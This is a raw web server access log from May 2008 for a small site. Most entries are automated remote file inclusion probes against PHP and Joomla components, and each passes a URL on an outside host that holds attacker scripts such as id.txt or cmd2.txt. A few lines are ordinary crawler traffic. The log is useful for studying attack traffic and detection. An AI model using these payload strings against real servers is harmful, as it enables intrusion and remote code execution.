67.19.61.90 - - [16/May/2008:09:10:34 -0700] "GET /logs/access_080129.log//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [16/May/2008:09:10:34 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [16/May/2008:09:10:34 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [16/May/2008:09:10:41 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:10:50 -0700] "GET /logs/access_080129.log//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:10:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:10:50 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:10:51 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:10:54 -0700] "GET /logs/access_080129.log//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:10:54 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:10:55 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:10:56 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.70.4.160 - - [16/May/2008:09:11:03 -0700] "GET /logs/access_080218.log/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.79.246.70 - - [16/May/2008:09:11:03 -0700] "GET /logs/access_080129.log//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.192.194 - - [16/May/2008:09:11:04 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.79.246.70 - - [16/May/2008:09:11:04 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.79.246.70 - - [16/May/2008:09:11:04 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.79.246.70 - - [16/May/2008:09:11:18 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:09:11:30 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:09:11:30 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:09:11:31 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:09:11:38 -0700] "GET /logs/access_080209.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:09:11:40 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:09:11:41 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:09:11:41 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.178.176.36 - - [16/May/2008:09:11:46 -0700] "GET /logs/access_080209.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.fahrschule-duenhoeft.de/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:11:49 -0700] "GET /logs/access_080218.log//skin/zero_vote/ask_password.php?dir=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:12:49 -0700] "GET /logs/access_080327.log//admin/classes/TplLoad.php?full_path_to_public_program=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:12:57 -0700] "GET /logs/access_080218.log//skin/zero_vote/error.php?dir=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:12:59 -0700] "GET /logs/access_080309.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:12:59 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:12:59 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:09:13:24 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.96.81 - - [16/May/2008:09:13:26 -0700] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.40.96.81 - - [16/May/2008:09:13:26 -0700] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:13:29 -0700] "GET /logs/access_080221.log/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:09:13:29 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:13:35 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:13:35 -0700] "GET /index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
219.94.128.57 - - [16/May/2008:09:13:41 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [16/May/2008:09:13:47 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [16/May/2008:09:13:53 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:14:02 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:14:09 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:14:09 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:14:10 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.113.24.150 - - [16/May/2008:09:14:14 -0700] "GET /logs/main.php?x=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.150 - - [16/May/2008:09:14:14 -0700] "GET /main.php?x=http://200.169.80.9/log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:09:14:17 -0700] "GET /retreat1/webcam/retreat1_00101.jpg HTTP/1.1" 200 15702 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
74.6.21.158 - - [16/May/2008:09:14:25 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.107 - - [16/May/2008:09:14:26 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.82.209.212 - - [16/May/2008:09:14:29 -0700] "GET /logs//?mosConfig_absolute_path=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 200 47704 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
80.82.209.212 - - [16/May/2008:09:14:33 -0700] "GET //?mosConfig_absolute_path=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:14:42 -0700] "GET /logs/access_071214.log//?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:14:47 -0700] "GET /logs//?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 200 47704 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:14:51 -0700] "GET //?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:09:15:14 -0700] "GET /retreat1/webcam/retreat1_00168.jpg HTTP/1.1" 200 48240 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
193.47.80.135 - - [16/May/2008:09:15:18 -0700] "GET /mobileoffice/Picture_010.jpg HTTP/1.1" 200 546454 "-" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:15:19 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:15:20 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.47.80.135 - - [16/May/2008:09:15:25 -0700] "GET /mobileoffice/Picture_003.jpg HTTP/1.1" 200 625601 "-" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" "www.dmulk.com"
221.143.49.246 - - [16/May/2008:09:15:47 -0700] "GET //include/write.php?dir=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
221.143.49.246 - - [16/May/2008:09:15:47 -0700] "GET /logs//include/write.php?dir=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:16:01 -0700] "GET /logs/access_080418.log//citywriter/head.php?path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:16:02 -0700] "GET //citywriter/head.php?path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:16:02 -0700] "GET /logs//citywriter/head.php?path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:09:16:27 -0700] "GET /retreat1/webcam/retreat1_00185.jpg HTTP/1.1" 200 44737 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
61.115.228.135 - - [16/May/2008:09:16:46 -0700] "GET //common.inc.php?base_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:16:55 -0700] "GET /logs/access_080309.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:16:56 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:16:56 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.61.90 - - [16/May/2008:09:17:17 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [16/May/2008:09:17:18 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:09:17:26 -0700] "GET /retreat1/webcam/retreat1_00190.jpg HTTP/1.1" 200 41741 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
219.94.128.57 - - [16/May/2008:09:17:38 -0700] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:09:17:47 -0700] "GET /logs/access_080218.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:09:17:47 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.242.220.51 - - [16/May/2008:09:17:47 -0700] "GET /logs/home.php?pagina=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.220.51 - - [16/May/2008:09:17:47 -0700] "GET /logs/home.php?pagina=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:09:17:47 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.242.220.51 - - [16/May/2008:09:17:47 -0700] "GET /home.php?pagina=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.220.51 - - [16/May/2008:09:17:47 -0700] "GET /home.php?pagina=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.95.82.113 - - [16/May/2008:09:17:49 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:18:10 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:18:13 -0700] "GET //openi-admin/base/fileloader.php?config[openi_dir]=http://freewebs.com/alb_rinia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:18:14 -0700] "GET /logs//openi-admin/base/fileloader.php?config[openi_dir]=http://freewebs.com/alb_rinia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:18:16 -0700] "GET /logs/access_080313.log//?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:18:22 -0700] "GET /logs//?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 200 47704 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.70.11 - - [16/May/2008:09:18:23 -0700] "GET /logs/access_080128.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.geocities.com/cefill/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [16/May/2008:09:18:23 -0700] "GET /logs/access_080128.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.geocities.com/cefill/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:18:23 -0700] "GET //?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [16/May/2008:09:18:27 -0700] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.220.51 - - [16/May/2008:09:18:49 -0700] "GET /logs/home.php?pagina=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.220.51 - - [16/May/2008:09:18:50 -0700] "GET /home.php?pagina=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.182.98 - - [16/May/2008:09:19:08 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [16/May/2008:09:19:08 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.47.80.135 - - [16/May/2008:09:19:21 -0700] "GET /mobileoffice/Picture_014.jpg HTTP/1.1" 200 627051 "-" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:19:24 -0700] "GET /logs/access_080327.log//skin/zero_vote/ask_password.php?dir=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:19:37 -0700] "GET /logs/access_080207.log//?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.31.226 - - [16/May/2008:09:19:44 -0700] "GET /?N=D HTTP/1.0" 200 11590 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.221.191.24 - - [16/May/2008:09:19:47 -0700] "GET //displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:19:54 -0700] "GET /logs/access_080308.log/index.php?redir=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:19:59 -0700] "GET /logs/index.php?redir=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:20:03 -0700] "GET /index.php?redir=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:20:29 -0700] "GET /logs/access_080330.log//?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:20:34 -0700] "GET //?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:20:35 -0700] "GET /logs//?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 200 47704 "-" "libwww-perl/5.805" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:21:31 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.79.246.70 - - [16/May/2008:09:22:29 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.79.246.70 - - [16/May/2008:09:22:30 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.94.128.57 - - [16/May/2008:09:22:57 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [16/May/2008:09:22:58 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.201.173.14 - - [16/May/2008:09:23:15 -0700] "GET / HTTP/1.1" 200 11606 "http://forums.off-road.com/jeep-short-wheelbase/162537-amc-jeep-cj10a-aircraft-tug-have-questions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:09:23:24 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:09:23:35 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 200 11607 "-" "libwww-perl/5.805" "www.dmulk.com"
